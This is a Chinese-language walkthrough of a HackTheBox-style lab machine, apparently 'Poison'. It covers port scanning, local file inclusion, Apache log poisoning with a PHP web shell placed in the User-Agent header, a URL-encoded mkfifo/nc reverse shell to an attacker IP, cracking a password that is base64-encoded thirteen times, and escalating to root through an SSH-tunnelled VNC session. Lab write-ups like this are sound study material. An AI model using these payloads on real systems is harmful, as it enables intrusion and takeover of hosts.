[Meachines] [Medium] poison LFI+日志投毒+VNC权限提升

Мартин.2024-08-17 15:43

信息收集

IP Address Opening Ports
10.10.10.84 TCP:22,80

$ nmap -p- 10.10.10.84 --min-rate 1000 -sC -sV

bash 复制代码 
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

LFI & 日志投毒

http://10.10.10.84/browse.php?file=/etc/passwd

php 复制代码 
GET / HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_GET['cmd']); phpinfo(); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

http://10.10.10.84/browse.php?1=ls%20-la&file=/var/log/httpd-access.log

$ curl 'http://10.10.10.84/browse.php?1=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.16.24%2010032%20%3E%2Ftmp%2Ff&file=/var/log/httpd-access.log'

$ cat pwdbackup.txt

$ data=$(cat data); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data

Charix!2#4%6&8(0

$ su charix

$ ssh charix@10.10.10.84

User.txt

eaacdfb2d141b72a589233063604209c

权限提升

$ scp charix@10.10.10.84:/home/charix/secret.zip .

解压密码:Charix!2#4%6&8(0

$ file secret

VNC

% netstat -an -p tcp

5901是VNC端口,用于远程桌面访问。

% ps -auwwx | grep vnc

并且以ROOT权限运行

Xvnc :1:

这是 TightVNC 的 X 服务器进程。Xvnc 是一个 X 服务器,它允许在远程设备上运行图形界面。:1 指定了显示编号1。

-desktop X:

设置虚拟桌面的名称为 X。

-httpd /usr/local/share/tightvnc/classes:

指定 TightVNC 的 HTTP 服务器的目录,用于提供 VNC Java 客户端。

-auth /root/.Xauthority:

指定用于 X 服务器认证的授权文件路径。在这里是 /root/.Xauthority

-geometry 1280x800:

指定虚拟桌面的分辨率为 1280x800。

-depth 24:

指定颜色深度为 24 位。

-rfbwait 120000:

设置在开始连接前等待客户端响应的时间为 120000 毫秒(即 120 秒)。

-rfbauth /root/.vnc/passwd:

指定用于 VNC 连接的认证文件,即 /root/.vnc/passwd,这个文件包含了 VNC 的密码。

-rfbport 5901:

指定 VNC 服务器使用的端口号为 5901。VNC 默认使用 5900 端口,:1 表示加1,故使用 5901 端口。

-localhost:

限制 VNC 服务器只能接受来自本地的连接。这意味着只能从本地系统连接到这个 VNC 实例。

-nolisten tcp :1:

禁止 X 服务器监听 TCP 连接。这增加了安全性,因为不会接受来自远程设备的 TCP 连接。

$ ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

$ vncviewer 127.0.0.1:5901 -passwd secret

Root.txt

716d04b188419cf2bb99d891272361f5

相关推荐
郑州光合科技余经理9 天前
代码展示:PHP搭建海外版外卖系统源码解析
java·开发语言·前端·后端·系统架构·uni-app·php
feifeigo1239 天前
matlab画图工具
开发语言·matlab
dustcell.9 天前
haproxy七层代理
java·开发语言·前端
norlan_jame9 天前
C-PHY与D-PHY差异
c语言·开发语言
多恩Stone9 天前
【C++入门扫盲1】C++ 与 Python:类型、编译器/解释器与 CPU 的关系
开发语言·c++·人工智能·python·算法·3d·aigc
QQ4022054969 天前
Python+django+vue3预制菜半成品配菜平台
开发语言·python·django
遥遥江上月9 天前
Node.js + Stagehand + Python 部署
开发语言·python·node.js
m0_531237179 天前
C语言-数组练习进阶
c语言·开发语言·算法
Railshiqian9 天前
给android源码下的模拟器添加两个后排屏的修改
android·开发语言·javascript
雪人不是菜鸡9 天前
简单工厂模式
开发语言·算法·c#
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Window 10部署openclaw报错node.exe : npm error code 12805本地部署 OpenClaw + DeepSeek-R1 完全指南06OpenClaw优化飞书API 额度已耗尽问题07OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09OpenClaw 飞书机器人不回复消息?3 小时踩坑总结10小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)